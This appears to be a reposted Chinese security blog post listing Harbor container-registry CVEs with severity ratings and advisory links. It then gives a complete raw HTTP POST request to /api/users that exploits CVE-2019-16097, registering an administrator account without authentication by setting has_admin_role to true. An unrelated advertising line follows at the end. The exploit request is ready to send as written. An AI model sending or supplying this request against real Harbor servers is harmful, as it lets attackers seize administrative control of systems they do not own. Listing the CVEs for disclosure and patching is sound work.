安全研究

CVE-2019-19026(SQL注入,高危):https://github.com/goharbor/harbor/security/advisories/GHSA-rh89-vvrg-fg64(需管理权限)
CVE-2019-19029(SQL注入,高危):https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w (需管理权限)
CVE-2019-19025(CSRF保护缺失,严重):https://github.com/goharbor/harbor/security/advisories/GHSA-gcqm-v682-ccw6(需诱导授权)
CVE-2019-19023(权限提升,严重):https://github.com/goharbor/harbor/security/advisories/GHSA-3868-7c5x-4827(需权限)
CVE-2019-3990(用户枚举,中危):https://github.com/goharbor/harbor/security/advisories/GHSA-6qj9-33j4-rvhg(需普通用户权限)
 
 

CVE-2019-16097 Harbor任意管理员注册漏洞(无需权限)

POST /api/users HTTP/1.1
Host: [Host]
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Content-Type:application/json
Accept:application/json
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: beegosessionID=f1c3e4f2ed87967c13b9d6e1c3e7e1fd
Content-Length: 134

{"username":"7hang","email":"7hang@qq.com","realname":"7hang","password":"test123","comment":"11111","has_admin_role":true}
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/AtesetEnginner/p/12016121.html